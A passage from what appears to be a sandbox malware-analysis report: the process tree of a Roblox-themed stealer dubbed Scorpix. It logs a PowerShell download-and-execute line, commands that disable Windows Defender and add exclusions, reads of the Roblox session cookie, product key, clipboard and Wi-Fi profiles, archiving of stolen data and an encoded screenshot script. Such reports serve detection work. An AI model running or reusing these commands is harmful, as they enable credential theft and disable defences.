AaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uqf03wjx\uqf03wjx.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE66.tmp" "c:\Users\Admin\AppData\Local\Temp\uqf03wjx\CSC55824061BA314DD8AC4B53DC122752FF.TMP"6⤵
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵
-
C:\Windows\system32\getmac.exegetmac4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3044"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 30444⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3044"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 30444⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2896"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 28964⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2896"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 28964⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2928"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 29284⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2928"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 29284⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3184"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 31844⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3184"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 31844⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2196"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 21964⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2196"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 21964⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3404"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 34044⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3404"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 34044⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4788"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 47884⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4788"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 47884⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4256"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 42564⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4256"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 42564⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4072"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40724⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4072"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40724⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI42202\rar.exe a -r -hp"yelex123" "C:\Users\Admin\AppData\Local\Temp\hRzzW.zip" *"3⤵
-
C:\Users\Admin\AppData\Local\Temp\_MEI42202\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI42202\rar.exe a -r -hp"yelex123" "C:\Users\Admin\AppData\Local\Temp\hRzzW.zip" *4⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Desktop\Release of V3\Scorpix.exe""3⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost -n 34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Release of V3\Scorpix-V2.bat" "1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $down=New-Object System.Net.WebClient;$url='https://github.com/booyaskas/Scorpoxe/releases/download/vypix/Scorpix.exe';$file='Scorpix.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Release of V3\Scorpix-V2.bat" "1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $down=New-Object System.Net.WebClient;$url='https://github.com/booyaskas/Scorpoxe/releases/download/vypix/Scorpix.exe';$file='Scorpix.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Desktop\Release of V3\Scorpix.exe"C:\Users\Admin\Desktop\Release of V3\Scorpix.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Desktop\Release of V3\Scorpix.exe"C:\Users\Admin\Desktop\Release of V3\Scorpix.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Release of V3\Scorpix.exe'"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Release of V3\Scorpix.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"8⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"8⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid9⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"8⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name9⤵
- Detects videocard installed
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Injected', 0, 'Message', 48+16);close()""5⤵
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Injected', 0, 'Message', 48+16);close()"6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"5⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 26⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"5⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 26⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\Release of V3\Scorpix.exe""5⤵
- Hide Artifacts: Hidden Files and Directories
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\Desktop\Release of V3\Scorpix.exe"6⤵
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
- Clipboard Data
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
-
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"5⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwA